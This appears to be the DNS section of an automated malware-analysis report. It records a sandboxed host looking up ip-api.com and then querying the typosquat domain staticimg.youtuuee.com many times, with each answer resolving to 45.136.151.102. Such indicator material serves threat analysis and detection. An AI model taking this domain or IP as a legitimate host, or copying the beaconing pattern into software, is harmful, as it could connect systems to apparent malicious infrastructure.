Oct 24, 2021 09:47:29.765466928 CEST 192.168.2.5 8.8.8.8 0x7045 Standard query (0) staticimg.youtuuee.com A (IP address) IN (0x0001)

Oct 24, 2021 09:47:30.813688040 CEST 192.168.2.5 8.8.8.8 0x38d8 Standard query (0) staticimg.youtuuee.com A (IP address) IN (0x0001)

Oct 24, 2021 09:47:32.156006098 CEST 192.168.2.5 8.8.8.8 0xc19c Standard query (0) staticimg.youtuuee.com A (IP address) IN (0x0001)

Oct 24, 2021 09:47:32.789815903 CEST 192.168.2.5 8.8.8.8 0xa789 Standard query (0) staticimg.youtuuee.com A (IP address) IN (0x0001)

Oct 24, 2021 09:47:33.416050911 CEST 192.168.2.5 8.8.8.8 0xd6e6 Standard query (0) staticimg.youtuuee.com A (IP address) IN (0x0001)

Oct 24, 2021 09:47:34.055989027 CEST 192.168.2.5 8.8.8.8 0x829b Standard query (0) staticimg.youtuuee.com A (IP address) IN (0x0001)

Oct 24, 2021 09:47:34.681870937 CEST 192.168.2.5 8.8.8.8 0x7737 Standard query (0) staticimg.youtuuee.com A (IP address) IN (0x0001)

Oct 24, 2021 09:47:35.311105013 CEST 192.168.2.5 8.8.8.8 0xa830 Standard query (0) staticimg.youtuuee.com A (IP address) IN (0x0001)

Oct 24, 2021 09:47:35.910501957 CEST 192.168.2.5 8.8.8.8 0x9192 Standard query (0) staticimg.youtuuee.com A (IP address) IN (0x0001)

Oct 24, 2021 09:47:36.514367104 CEST 192.168.2.5 8.8.8.8 0x8a43 Standard query (0) staticimg.youtuuee.com A (IP address) IN (0x0001)

Oct 24, 2021 09:47:37.144071102 CEST 192.168.2.5 8.8.8.8 0x9f3b Standard query (0) staticimg.youtuuee.com A (IP address) IN (0x0001)

Oct 24, 2021 09:47:37.766935110 CEST 192.168.2.5 8.8.8.8 0xa3aa Standard query (0) staticimg.youtuuee.com A (IP address) IN (0x0001)

Oct 24, 2021 09:47:38.386548996 CEST 192.168.2.5 8.8.8.8 0x84a2 Standard query (0) staticimg.youtuuee.com A (IP address) IN (0x0001)

Oct 24, 2021 09:47:38.997009039 CEST 192.168.2.5 8.8.8.8 0x4745 Standard query (0) staticimg.youtuuee.com A (IP address) IN (0x0001)

Oct 24, 2021 09:47:39.611651897 CEST 192.168.2.5 8.8.8.8 0xed77 Standard query (0) staticimg.youtuuee.com A (IP address) IN (0x0001)

Oct 24, 2021 09:47:40.232979059 CEST 192.168.2.5 8.8.8.8 0x1158 Standard query (0) staticimg.youtuuee.com A (IP address) IN (0x0001)

Oct 24, 2021 09:47:40.849301100 CEST 192.168.2.5 8.8.8.8 0x44a0 Standard query (0) staticimg.youtuuee.com A (IP address) IN (0x0001)

Oct 24, 2021 09:47:41.487714052 CEST 192.168.2.5 8.8.8.8 0x96c0 Standard query (0) staticimg.youtuuee.com A (IP address) IN (0x0001)

Oct 24, 2021 09:47:42.107141018 CEST 192.168.2.5 8.8.8.8 0x5c7b Standard query (0) staticimg.youtuuee.com A (IP address) IN (0x0001)

Oct 24, 2021 09:47:42.728333950 CEST 192.168.2.5 8.8.8.8 0x461b Standard query (0) staticimg.youtuuee.com A (IP address) IN (0x0001)

Oct 24, 2021 09:47:43.352515936 CEST 192.168.2.5 8.8.8.8 0x9a08 Standard query (0) staticimg.youtuuee.com A (IP address) IN (0x0001)

Oct 24, 2021 09:47:43.974478006 CEST 192.168.2.5 8.8.8.8 0xcad7 Standard query (0) staticimg.youtuuee.com A (IP address) IN (0x0001)

Oct 24, 2021 09:47:44.910770893 CEST 192.168.2.5 8.8.8.8 0xa550 Standard query (0) staticimg.youtuuee.com A (IP address) IN (0x0001)

Oct 24, 2021 09:47:45.529999971 CEST 192.168.2.5 8.8.8.8 0x5f42 Standard query (0) staticimg.youtuuee.com A (IP address) IN (0x0001)

Oct 24, 2021 09:47:46.144649029 CEST 192.168.2.5 8.8.8.8 0xbac4 Standard query (0) staticimg.youtuuee.com A (IP address) IN (0x0001)

Oct 24, 2021 09:47:46.771471977 CEST 192.168.2.5 8.8.8.8 0x3771 Standard query (0) staticimg.youtuuee.com A (IP address) IN (0x0001)

Oct 24, 2021 09:47:47.387002945 CEST 192.168.2.5 8.8.8.8 0x7f47 Standard query (0) staticimg.youtuuee.com A (IP address) IN (0x0001)

Oct 24, 2021 09:47:47.994390965 CEST 192.168.2.5 8.8.8.8 0xf56e Standard query (0) staticimg.youtuuee.com A (IP address) IN (0x0001)

Oct 24, 2021 09:47:48.600059986 CEST 192.168.2.5 8.8.8.8 0x360d Standard query (0) staticimg.youtuuee.com A (IP address) IN (0x0001)

Oct 24, 2021 09:47:49.206872940 CEST 192.168.2.5 8.8.8.8 0x911c Standard query (0) staticimg.youtuuee.com A (IP address) IN (0x0001)

Oct 24, 2021 09:47:49.799350977 CEST 192.168.2.5 8.8.8.8 0xfd3 Standard query (0) staticimg.youtuuee.com A (IP address) IN (0x0001)

Oct 24, 2021 09:47:50.410588980 CEST 192.168.2.5 8.8.8.8 0xe416 Standard query (0) staticimg.youtuuee.com A (IP address) IN (0x0001)

Oct 24, 2021 09:47:51.041132927 CEST 192.168.2.5 8.8.8.8 0xecad Standard query (0) staticimg.youtuuee.com A (IP address) IN (0x0001)

Oct 24, 2021 09:47:51.645896912 CEST 192.168.2.5 8.8.8.8 0x5b5 Standard query (0) staticimg.youtuuee.com A (IP address) IN (0x0001)

Oct 24, 2021 09:47:52.257523060 CEST 192.168.2.5 8.8.8.8 0x36f Standard query (0) staticimg.youtuuee.com A (IP address) IN (0x0001)

Oct 24, 2021 09:47:52.875586033 CEST 192.168.2.5 8.8.8.8 0x68de Standard query (0) staticimg.youtuuee.com A (IP address) IN (0x0001)

Oct 24, 2021 09:47:53.473479033 CEST 192.168.2.5 8.8.8.8 0xf293 Standard query (0) staticimg.youtuuee.com A (IP address) IN (0x0001)

Oct 24, 2021 09:47:54.089143038 CEST 192.168.2.5 8.8.8.8 0x69a3 Standard query (0) staticimg.youtuuee.com A (IP address) IN (0x0001)

Oct 24, 2021 09:47:54.719775915 CEST 192.168.2.5 8.8.8.8 0x4eac Standard query (0) staticimg.youtuuee.com A (IP address) IN (0x0001)

Oct 24, 2021 09:47:55.327100992 CEST 192.168.2.5 8.8.8.8 0xe83f Standard query (0) staticimg.youtuuee.com A (IP address) IN (0x0001)

Oct 24, 2021 09:47:55.954521894 CEST 192.168.2.5 8.8.8.8 0xcc66 Standard query (0) staticimg.youtuuee.com A (IP address) IN (0x0001)

Oct 24, 2021 09:47:56.558793068 CEST 192.168.2.5 8.8.8.8 0xb24f Standard query (0) staticimg.youtuuee.com A (IP address) IN (0x0001)

Oct 24, 2021 09:47:57.189415932 CEST 192.168.2.5 8.8.8.8 0xff Standard query (0) staticimg.youtuuee.com A (IP address) IN (0x0001)

Oct 24, 2021 09:47:57.818434000 CEST 192.168.2.5 8.8.8.8 0xdca Standard query (0) staticimg.youtuuee.com A (IP address) IN (0x0001)

Oct 24, 2021 09:47:58.437071085 CEST 192.168.2.5 8.8.8.8 0xcdaa Standard query (0) staticimg.youtuuee.com A (IP address) IN (0x0001)

Oct 24, 2021 09:47:59.060106039 CEST 192.168.2.5 8.8.8.8 0x6f1c Standard query (0) staticimg.youtuuee.com A (IP address) IN (0x0001)

Oct 24, 2021 09:47:59.656584978 CEST 192.168.2.5 8.8.8.8 0xcd41 Standard query (0) staticimg.youtuuee.com A (IP address) IN (0x0001)

Oct 24, 2021 09:48:00.264033079 CEST 192.168.2.5 8.8.8.8 0x7608 Standard query (0) staticimg.youtuuee.com A (IP address) IN (0x0001)

Oct 24, 2021 09:48:00.877664089 CEST 192.168.2.5 8.8.8.8 0x825b Standard query (0) staticimg.youtuuee.com A (IP address) IN (0x0001)

Oct 24, 2021 09:48:01.487720013 CEST 192.168.2.5 8.8.8.8 0xcc3a Standard query (0) staticimg.youtuuee.com A (IP address) IN (0x0001)

Oct 24, 2021 09:48:02.112385035 CEST 192.168.2.5 8.8.8.8 0x95a Standard query (0) staticimg.youtuuee.com A (IP address) IN (0x0001)

DNS Answers

Timestamp Source IP Dest IP Trans ID Reply Code Name CName Address Type Class

Oct 24, 2021 09:46:11.976222992 CEST 8.8.8.8 192.168.2.5 0x9eb8 No error (0) ip-api.com 208.95.112.1 A (IP address) IN (0x0001)

Oct 24, 2021 09:46:12.482688904 CEST 8.8.8.8 192.168.2.5 0x70c5 No error (0) staticimg.youtuuee.com 45.136.151.102 A (IP address) IN (0x0001)

Oct 24, 2021 09:46:13.740453959 CEST

8.8.8.8 192.168.2.5 0xe681 No error (0) staticimg.youtuuee.com

45.136.151.102 A (IP address) IN (0x0001)

Oct 24, 2021 09:46:14.915924072 CEST

8.8.8.8 192.168.2.5 0x31f3 No error (0) staticimg.youtuuee.com

45.136.151.102 A (IP address) IN (0x0001)

Oct 24, 2021 09:46:15.947504997 CEST

8.8.8.8 192.168.2.5 0xe589 No error (0) staticimg.youtuuee.com

45.136.151.102 A (IP address) IN (0x0001)

Oct 24, 2021 09:46:17.197069883 CEST

8.8.8.8 192.168.2.5 0x9dac No error (0) staticimg.youtuuee.com

45.136.151.102 A (IP address) IN (0x0001)

Oct 24, 2021 09:46:18.367758036 CEST

8.8.8.8 192.168.2.5 0x8498 No error (0) staticimg.youtuuee.com

45.136.151.102 A (IP address) IN (0x0001)

Oct 24, 2021 09:46:19.863547087 CEST

8.8.8.8 192.168.2.5 0x84fe No error (0) staticimg.youtuuee.com

45.136.151.102 A (IP address) IN (0x0001)

Oct 24, 2021 09:46:21.295439005 CEST

8.8.8.8 192.168.2.5 0x8a28 No error (0) staticimg.youtuuee.com

45.136.151.102 A (IP address) IN (0x0001)

Oct 24, 2021 09:46:22.591523886 CEST

8.8.8.8 192.168.2.5 0xe2c7 No error (0) staticimg.youtuuee.com

45.136.151.102 A (IP address) IN (0x0001)

Oct 24, 2021 09:46:23.921989918 CEST

8.8.8.8 192.168.2.5 0x64d7 No error (0) staticimg.youtuuee.com

45.136.151.102 A (IP address) IN (0x0001)

Oct 24, 2021 09:46:25.463247061 CEST

8.8.8.8 192.168.2.5 0xdace No error (0) staticimg.youtuuee.com

45.136.151.102 A (IP address) IN (0x0001)

Oct 24, 2021 09:46:26.984664917 CEST

8.8.8.8 192.168.2.5 0x6af1 No error (0) staticimg.youtuuee.com

45.136.151.102 A (IP address) IN (0x0001)

Oct 24, 2021 09:46:28.622839928 CEST  8.8.8.8  192.168.2.5  0x5c0b  No error (0)  staticimg.youtuuee.com  45.136.151.102  A (IP address)  IN (0x0001)
Oct 24, 2021 09:46:30.084511042 CEST  8.8.8.8  192.168.2.5  0xed9f  No error (0)  staticimg.youtuuee.com  45.136.151.102  A (IP address)  IN (0x0001)
Oct 24, 2021 09:46:31.772547960 CEST  8.8.8.8  192.168.2.5  0xa4a9  No error (0)  staticimg.youtuuee.com  45.136.151.102  A (IP address)  IN (0x0001)
Oct 24, 2021 09:46:33.425863028 CEST  8.8.8.8  192.168.2.5  0xe6d1  No error (0)  staticimg.youtuuee.com  45.136.151.102  A (IP address)  IN (0x0001)
Oct 24, 2021 09:46:34.912228107 CEST  8.8.8.8  192.168.2.5  0xccc3  No error (0)  staticimg.youtuuee.com  45.136.151.102  A (IP address)  IN (0x0001)
Oct 24, 2021 09:46:36.402184963 CEST  8.8.8.8  192.168.2.5  0xde90  No error (0)  staticimg.youtuuee.com  45.136.151.102  A (IP address)  IN (0x0001)
Oct 24, 2021 09:46:37.854722977 CEST  8.8.8.8  192.168.2.5  0x3d9  No error (0)  staticimg.youtuuee.com  45.136.151.102  A (IP address)  IN (0x0001)
Oct 24, 2021 09:46:39.137234926 CEST  8.8.8.8  192.168.2.5  0x2d99  No error (0)  staticimg.youtuuee.com  45.136.151.102  A (IP address)  IN (0x0001)
Oct 24, 2021 09:46:40.732676983 CEST  8.8.8.8  192.168.2.5  0x4bb7  No error (0)  staticimg.youtuuee.com  45.136.151.102  A (IP address)  IN (0x0001)
Oct 24, 2021 09:46:42.003353119 CEST  8.8.8.8  192.168.2.5  0x1393  No error (0)  staticimg.youtuuee.com  45.136.151.102  A (IP address)  IN (0x0001)
Oct 24, 2021 09:46:43.150230885 CEST  8.8.8.8  192.168.2.5  0x493e  No error (0)  staticimg.youtuuee.com  45.136.151.102  A (IP address)  IN (0x0001)
Oct 24, 2021 09:46:43.770291090 CEST  8.8.8.8  192.168.2.5  0x37a8  No error (0)  staticimg.youtuuee.com  45.136.151.102  A (IP address)  IN (0x0001)
Oct 24, 2021 09:46:44.410131931 CEST  8.8.8.8  192.168.2.5  0x449d  No error (0)  staticimg.youtuuee.com  45.136.151.102  A (IP address)  IN (0x0001)
Oct 24, 2021 09:46:45.035528898 CEST  8.8.8.8  192.168.2.5  0xc73e  No error (0)  staticimg.youtuuee.com  45.136.151.102  A (IP address)  IN (0x0001)
Oct 24, 2021 09:46:45.675551891 CEST  8.8.8.8  192.168.2.5  0x9934  No error (0)  staticimg.youtuuee.com  45.136.151.102  A (IP address)  IN (0x0001)


Oct 24, 2021 09:46:46.313957930 CEST  8.8.8.8  192.168.2.5  0xb8ed  No error (0)  staticimg.youtuuee.com  45.136.151.102  A (IP address)  IN (0x0001)
Oct 24, 2021 09:46:46.943269014 CEST  8.8.8.8  192.168.2.5  0x34f7  No error (0)  staticimg.youtuuee.com  45.136.151.102  A (IP address)  IN (0x0001)
Oct 24, 2021 09:46:47.591645002 CEST  8.8.8.8  192.168.2.5  0x367c  No error (0)  staticimg.youtuuee.com  45.136.151.102  A (IP address)  IN (0x0001)
Oct 24, 2021 09:46:48.245228052 CEST  8.8.8.8  192.168.2.5  0x81a9  No error (0)  staticimg.youtuuee.com  45.136.151.102  A (IP address)  IN (0x0001)
Oct 24, 2021 09:46:48.868161917 CEST  8.8.8.8  192.168.2.5  0xbe8f  No error (0)  staticimg.youtuuee.com  45.136.151.102  A (IP address)  IN (0x0001)
Oct 24, 2021 09:46:49.503611088 CEST  8.8.8.8  192.168.2.5  0x8469  No error (0)  staticimg.youtuuee.com  45.136.151.102  A (IP address)  IN (0x0001)
Oct 24, 2021 09:46:50.135504961 CEST  8.8.8.8  192.168.2.5  0x23af  No error (0)  staticimg.youtuuee.com  45.136.151.102  A (IP address)  IN (0x0001)
Oct 24, 2021 09:46:50.767919064 CEST  8.8.8.8  192.168.2.5  0x35c  No error (0)  staticimg.youtuuee.com  45.136.151.102  A (IP address)  IN (0x0001)
Oct 24, 2021 09:46:51.395010948 CEST  8.8.8.8  192.168.2.5  0x82eb  No error (0)  staticimg.youtuuee.com  45.136.151.102  A (IP address)  IN (0x0001)
Oct 24, 2021 09:46:52.018250942 CEST  8.8.8.8  192.168.2.5  0xabd4  No error (0)  staticimg.youtuuee.com  45.136.151.102  A (IP address)  IN (0x0001)
Oct 24, 2021 09:46:52.646979094 CEST  8.8.8.8  192.168.2.5  0x7d96  No error (0)  staticimg.youtuuee.com  45.136.151.102  A (IP address)  IN (0x0001)
Oct 24, 2021 09:46:53.274059057 CEST  8.8.8.8  192.168.2.5  0xa1d4  No error (0)  staticimg.youtuuee.com  45.136.151.102  A (IP address)  IN (0x0001)
Oct 24, 2021 09:46:53.904247999 CEST  8.8.8.8  192.168.2.5  0x82e6  No error (0)  staticimg.youtuuee.com  45.136.151.102  A (IP address)  IN (0x0001)
Oct 24, 2021 09:46:54.530499935 CEST  8.8.8.8  192.168.2.5  0x4eba  No error (0)  staticimg.youtuuee.com  45.136.151.102  A (IP address)  IN (0x0001)
Oct 24, 2021 09:46:55.171437979 CEST  8.8.8.8  192.168.2.5  0x29fb  No error (0)  staticimg.youtuuee.com  45.136.151.102  A (IP address)  IN (0x0001)
Oct 24, 2021 09:46:55.796912909 CEST  8.8.8.8  192.168.2.5  0xb16d  No error (0)  staticimg.youtuuee.com  45.136.151.102  A (IP address)  IN (0x0001)
Oct 24, 2021 09:46:56.437997103 CEST  8.8.8.8  192.168.2.5  0x187d  No error (0)  staticimg.youtuuee.com  45.136.151.102  A (IP address)  IN (0x0001)
Oct 24, 2021 09:46:57.103617907 CEST  8.8.8.8  192.168.2.5  0x74ac  No error (0)  staticimg.youtuuee.com  45.136.151.102  A (IP address)  IN (0x0001)
Oct 24, 2021 09:46:57.732459068 CEST  8.8.8.8  192.168.2.5  0xbf1d  No error (0)  staticimg.youtuuee.com  45.136.151.102  A (IP address)  IN (0x0001)
Oct 24, 2021 09:46:58.361526012 CEST  8.8.8.8  192.168.2.5  0x9bba  No error (0)  staticimg.youtuuee.com  45.136.151.102  A (IP address)  IN (0x0001)
Oct 24, 2021 09:46:58.979845047 CEST  8.8.8.8  192.168.2.5  0x42ad  No error (0)  staticimg.youtuuee.com  45.136.151.102  A (IP address)  IN (0x0001)
Oct 24, 2021 09:46:59.605251074 CEST  8.8.8.8  192.168.2.5  0x800d  No error (0)  staticimg.youtuuee.com  45.136.151.102  A (IP address)  IN (0x0001)
Oct 24, 2021 09:47:00.254426003 CEST  8.8.8.8  192.168.2.5  0x654a  No error (0)  staticimg.youtuuee.com  45.136.151.102  A (IP address)  IN (0x0001)
Oct 24, 2021 09:47:00.873423100 CEST  8.8.8.8  192.168.2.5  0x1137  No error (0)  staticimg.youtuuee.com  45.136.151.102  A (IP address)  IN (0x0001)
Oct 24, 2021 09:47:01.506788015 CEST  8.8.8.8  192.168.2.5  0x1ba  No error (0)  staticimg.youtuuee.com  45.136.151.102  A (IP address)  IN (0x0001)
Oct 24, 2021 09:47:02.126943111 CEST  8.8.8.8  192.168.2.5  0x9dae  No error (0)  staticimg.youtuuee.com  45.136.151.102  A (IP address)  IN (0x0001)


Oct 24, 2021 09:47:02.734566927 CEST  8.8.8.8  192.168.2.5  0xd880  No error (0)  staticimg.youtuuee.com  45.136.151.102  A (IP address)  IN (0x0001)
Oct 24, 2021 09:47:03.373521090 CEST  8.8.8.8  192.168.2.5  0xc520  No error (0)  staticimg.youtuuee.com  45.136.151.102  A (IP address)  IN (0x0001)
Oct 24, 2021 09:47:04.008299112 CEST  8.8.8.8  192.168.2.5  0x6619  No error (0)  staticimg.youtuuee.com  45.136.151.102  A (IP address)  IN (0x0001)
Oct 24, 2021 09:47:04.630717039 CEST  8.8.8.8  192.168.2.5  0xa0c7  No error (0)  staticimg.youtuuee.com  45.136.151.102  A (IP address)  IN (0x0001)
Oct 24, 2021 09:47:05.252378941 CEST  8.8.8.8  192.168.2.5  0xded4  No error (0)  staticimg.youtuuee.com  45.136.151.102  A (IP address)  IN (0x0001)
Oct 24, 2021 09:47:05.897815943 CEST  8.8.8.8  192.168.2.5  0xc7b8  No error (0)  staticimg.youtuuee.com  45.136.151.102  A (IP address)  IN (0x0001)
Oct 24, 2021 09:47:06.542243958 CEST  8.8.8.8  192.168.2.5  0xe70a  No error (0)  staticimg.youtuuee.com  45.136.151.102  A (IP address)  IN (0x0001)
Oct 24, 2021 09:47:07.151657104 CEST  8.8.8.8  192.168.2.5  0xa97e  No error (0)  staticimg.youtuuee.com  45.136.151.102  A (IP address)  IN (0x0001)
Oct 24, 2021 09:47:07.784101963 CEST  8.8.8.8  192.168.2.5  0xe8de  No error (0)  staticimg.youtuuee.com  45.136.151.102  A (IP address)  IN (0x0001)
Oct 24, 2021 09:47:08.405812979 CEST  8.8.8.8  192.168.2.5  0x8d83  No error (0)  staticimg.youtuuee.com  45.136.151.102  A (IP address)  IN (0x0001)
Oct 24, 2021 09:47:09.020821095 CEST  8.8.8.8  192.168.2.5  0x30ae  No error (0)  staticimg.youtuuee.com  45.136.151.102  A (IP address)  IN (0x0001)
Oct 24, 2021 09:47:09.643799067 CEST  8.8.8.8  192.168.2.5  0x4a01  No error (0)  staticimg.youtuuee.com  45.136.151.102  A (IP address)  IN (0x0001)
Oct 24, 2021 09:47:10.266096115 CEST  8.8.8.8  192.168.2.5  0x6280  No error (0)  staticimg.youtuuee.com  45.136.151.102  A (IP address)  IN (0x0001)
Oct 24, 2021 09:47:10.980098009 CEST  8.8.8.8  192.168.2.5  0xdb87  No error (0)  staticimg.youtuuee.com  45.136.151.102  A (IP address)  IN (0x0001)
Oct 24, 2021 09:47:11.975509882 CEST  8.8.8.8  192.168.2.5  0x197e  No error (0)  staticimg.youtuuee.com  45.136.151.102  A (IP address)  IN (0x0001)
Oct 24, 2021 09:47:13.248315096 CEST  8.8.8.8  192.168.2.5  0x31c7  No error (0)  staticimg.youtuuee.com  45.136.151.102  A (IP address)  IN (0x0001)
Oct 24, 2021 09:47:13.916690111 CEST  8.8.8.8  192.168.2.5  0x22e5  No error (0)  staticimg.youtuuee.com  45.136.151.102  A (IP address)  IN (0x0001)
Oct 24, 2021 09:47:14.525177002 CEST  8.8.8.8  192.168.2.5  0x9cba  No error (0)  staticimg.youtuuee.com  45.136.151.102  A (IP address)  IN (0x0001)
Oct 24, 2021 09:47:15.129575014 CEST  8.8.8.8  192.168.2.5  0xac31  No error (0)  staticimg.youtuuee.com  45.136.151.102  A (IP address)  IN (0x0001)
Oct 24, 2021 09:47:15.741206884 CEST  8.8.8.8  192.168.2.5  0xc91  No error (0)  staticimg.youtuuee.com  45.136.151.102  A (IP address)  IN (0x0001)
Oct 24, 2021 09:47:16.380837917 CEST  8.8.8.8  192.168.2.5  0xbb6  No error (0)  staticimg.youtuuee.com  45.136.151.102  A (IP address)  IN (0x0001)
Oct 24, 2021 09:47:16.999514103 CEST  8.8.8.8  192.168.2.5  0xd77c  No error (0)  staticimg.youtuuee.com  45.136.151.102  A (IP address)  IN (0x0001)
Oct 24, 2021 09:47:17.613404989 CEST  8.8.8.8  192.168.2.5  0x6291  No error (0)  staticimg.youtuuee.com  45.136.151.102  A (IP address)  IN (0x0001)
Oct 24, 2021 09:47:18.568649054 CEST  8.8.8.8  192.168.2.5  0x852f  No error (0)  staticimg.youtuuee.com  45.136.151.102  A (IP address)  IN (0x0001)
Oct 24, 2021 09:47:19.185070038 CEST  8.8.8.8  192.168.2.5  0x57a2  No error (0)  staticimg.youtuuee.com  45.136.151.102  A (IP address)  IN (0x0001)
Oct 24, 2021 09:47:19.797535896 CEST  8.8.8.8  192.168.2.5  0xc556  No error (0)  staticimg.youtuuee.com  45.136.151.102  A (IP address)  IN (0x0001)


Oct 24, 2021 09:47:20.399183989 CEST  8.8.8.8  192.168.2.5  0x46f3  No error (0)  staticimg.youtuuee.com  45.136.151.102  A (IP address)  IN (0x0001)
Oct 24, 2021 09:47:21.013571978 CEST  8.8.8.8  192.168.2.5  0xf185  No error (0)  staticimg.youtuuee.com  45.136.151.102  A (IP address)  IN (0x0001)
Oct 24, 2021 09:47:21.621269941 CEST  8.8.8.8  192.168.2.5  0x1604  No error (0)  staticimg.youtuuee.com  45.136.151.102  A (IP address)  IN (0x0001)
Oct 24, 2021 09:47:22.251352072 CEST  8.8.8.8  192.168.2.5  0x94b  No error (0)  staticimg.youtuuee.com  45.136.151.102  A (IP address)  IN (0x0001)
Oct 24, 2021 09:47:22.899736881 CEST  8.8.8.8  192.168.2.5  0x47d3  No error (0)  staticimg.youtuuee.com  45.136.151.102  A (IP address)  IN (0x0001)
Oct 24, 2021 09:47:23.521917105 CEST  8.8.8.8  192.168.2.5  0xf03d  No error (0)  staticimg.youtuuee.com  45.136.151.102  A (IP address)  IN (0x0001)
Oct 24, 2021 09:47:24.131295919 CEST  8.8.8.8  192.168.2.5  0xc178  No error (0)  staticimg.youtuuee.com  45.136.151.102  A (IP address)  IN (0x0001)
Oct 24, 2021 09:47:24.780937910 CEST  8.8.8.8  192.168.2.5  0x3452  No error (0)  staticimg.youtuuee.com  45.136.151.102  A (IP address)  IN (0x0001)
Oct 24, 2021 09:47:25.413681030 CEST  8.8.8.8  192.168.2.5  0xcb54  No error (0)  staticimg.youtuuee.com  45.136.151.102  A (IP address)  IN (0x0001)
Oct 24, 2021 09:47:26.027328968 CEST  8.8.8.8  192.168.2.5  0xcbc1  No error (0)  staticimg.youtuuee.com  45.136.151.102  A (IP address)  IN (0x0001)
Oct 24, 2021 09:47:26.631810904 CEST  8.8.8.8  192.168.2.5  0xcd1c  No error (0)  staticimg.youtuuee.com  45.136.151.102  A (IP address)  IN (0x0001)
Oct 24, 2021 09:47:27.253463030 CEST  8.8.8.8  192.168.2.5  0xbda2  No error (0)  staticimg.youtuuee.com  45.136.151.102  A (IP address)  IN (0x0001)
Oct 24, 2021 09:47:27.865590096 CEST  8.8.8.8  192.168.2.5  0xc3e3  No error (0)  staticimg.youtuuee.com  45.136.151.102  A (IP address)  IN (0x0001)
Oct 24, 2021 09:47:28.457813978 CEST  8.8.8.8  192.168.2.5  0xd6db  No error (0)  staticimg.youtuuee.com  45.136.151.102  A (IP address)  IN (0x0001)
Oct 24, 2021 09:47:29.146256924 CEST  8.8.8.8  192.168.2.5  0x54b1  No error (0)  staticimg.youtuuee.com  45.136.151.102  A (IP address)  IN (0x0001)
Oct 24, 2021 09:47:29.783416033 CEST  8.8.8.8  192.168.2.5  0x7045  No error (0)  staticimg.youtuuee.com  45.136.151.102  A (IP address)  IN (0x0001)
Oct 24, 2021 09:47:30.829247952 CEST  8.8.8.8  192.168.2.5  0x38d8  No error (0)  staticimg.youtuuee.com  45.136.151.102  A (IP address)  IN (0x0001)
Oct 24, 2021 09:47:32.173935890 CEST  8.8.8.8  192.168.2.5  0xc19c  No error (0)  staticimg.youtuuee.com  45.136.151.102  A (IP address)  IN (0x0001)
Oct 24, 2021 09:47:32.807846069 CEST  8.8.8.8  192.168.2.5  0xa789  No error (0)  staticimg.youtuuee.com  45.136.151.102  A (IP address)  IN (0x0001)
Oct 24, 2021 09:47:33.433953047 CEST  8.8.8.8  192.168.2.5  0xd6e6  No error (0)  staticimg.youtuuee.com  45.136.151.102  A (IP address)  IN (0x0001)
Oct 24, 2021 09:47:34.074692965 CEST  8.8.8.8  192.168.2.5  0x829b  No error (0)  staticimg.youtuuee.com  45.136.151.102  A (IP address)  IN (0x0001)
Oct 24, 2021 09:47:34.699784040 CEST  8.8.8.8  192.168.2.5  0x7737  No error (0)  staticimg.youtuuee.com  45.136.151.102  A (IP address)  IN (0x0001)
Oct 24, 2021 09:47:35.329610109 CEST  8.8.8.8  192.168.2.5  0xa830  No error (0)  staticimg.youtuuee.com  45.136.151.102  A (IP address)  IN (0x0001)
Oct 24, 2021 09:47:35.929393053 CEST  8.8.8.8  192.168.2.5  0x9192  No error (0)  staticimg.youtuuee.com  45.136.151.102  A (IP address)  IN (0x0001)
Oct 24, 2021 09:47:36.531472921 CEST  8.8.8.8  192.168.2.5  0x8a43  No error (0)  staticimg.youtuuee.com  45.136.151.102  A (IP address)  IN (0x0001)
Oct 24, 2021 09:47:37.161864996 CEST  8.8.8.8  192.168.2.5  0x9f3b  No error (0)  staticimg.youtuuee.com  45.136.151.102  A (IP address)  IN (0x0001)


Oct 24, 2021 09:47:37.784832954 CEST  8.8.8.8  192.168.2.5  0xa3aa  No error (0)  staticimg.youtuuee.com  45.136.151.102  A (IP address)  IN (0x0001)
Oct 24, 2021 09:47:38.405206919 CEST  8.8.8.8  192.168.2.5  0x84a2  No error (0)  staticimg.youtuuee.com  45.136.151.102  A (IP address)  IN (0x0001)
Oct 24, 2021 09:47:39.014890909 CEST  8.8.8.8  192.168.2.5  0x4745  No error (0)  staticimg.youtuuee.com  45.136.151.102  A (IP address)  IN (0x0001)
Oct 24, 2021 09:47:39.629781961 CEST  8.8.8.8  192.168.2.5  0xed77  No error (0)  staticimg.youtuuee.com  45.136.151.102  A (IP address)  IN (0x0001)
Oct 24, 2021 09:47:40.251389027 CEST  8.8.8.8  192.168.2.5  0x1158  No error (0)  staticimg.youtuuee.com  45.136.151.102  A (IP address)  IN (0x0001)
Oct 24, 2021 09:47:40.867505074 CEST  8.8.8.8  192.168.2.5  0x44a0  No error (0)  staticimg.youtuuee.com  45.136.151.102  A (IP address)  IN (0x0001)
Oct 24, 2021 09:47:41.505384922 CEST  8.8.8.8  192.168.2.5  0x96c0  No error (0)  staticimg.youtuuee.com  45.136.151.102  A (IP address)  IN (0x0001)
Oct 24, 2021 09:47:42.125135899 CEST  8.8.8.8  192.168.2.5  0x5c7b  No error (0)  staticimg.youtuuee.com  45.136.151.102  A (IP address)  IN (0x0001)
Oct 24, 2021 09:47:42.746428013 CEST  8.8.8.8  192.168.2.5  0x461b  No error (0)  staticimg.youtuuee.com  45.136.151.102  A (IP address)  IN (0x0001)
Oct 24, 2021 09:47:43.370395899 CEST  8.8.8.8  192.168.2.5  0x9a08  No error (0)  staticimg.youtuuee.com  45.136.151.102  A (IP address)  IN (0x0001)
Oct 24, 2021 09:47:43.990777969 CEST  8.8.8.8  192.168.2.5  0xcad7  No error (0)  staticimg.youtuuee.com  45.136.151.102  A (IP address)  IN (0x0001)
Oct 24, 2021 09:47:44.929102898 CEST  8.8.8.8  192.168.2.5  0xa550  No error (0)  staticimg.youtuuee.com  45.136.151.102  A (IP address)  IN (0x0001)
Oct 24, 2021 09:47:45.547961950 CEST  8.8.8.8  192.168.2.5  0x5f42  No error (0)  staticimg.youtuuee.com  45.136.151.102  A (IP address)  IN (0x0001)
Oct 24, 2021 09:47:46.162534952 CEST  8.8.8.8  192.168.2.5  0xbac4  No error (0)  staticimg.youtuuee.com  45.136.151.102  A (IP address)  IN (0x0001)
Oct 24, 2021 09:47:46.789660931 CEST  8.8.8.8  192.168.2.5  0x3771  No error (0)  staticimg.youtuuee.com  45.136.151.102  A (IP address)  IN (0x0001)
Oct 24, 2021 09:47:47.404970884 CEST  8.8.8.8  192.168.2.5  0x7f47  No error (0)  staticimg.youtuuee.com  45.136.151.102  A (IP address)  IN (0x0001)
Oct 24, 2021 09:47:48.012718916 CEST  8.8.8.8  192.168.2.5  0xf56e  No error (0)  staticimg.youtuuee.com  45.136.151.102  A (IP address)  IN (0x0001)
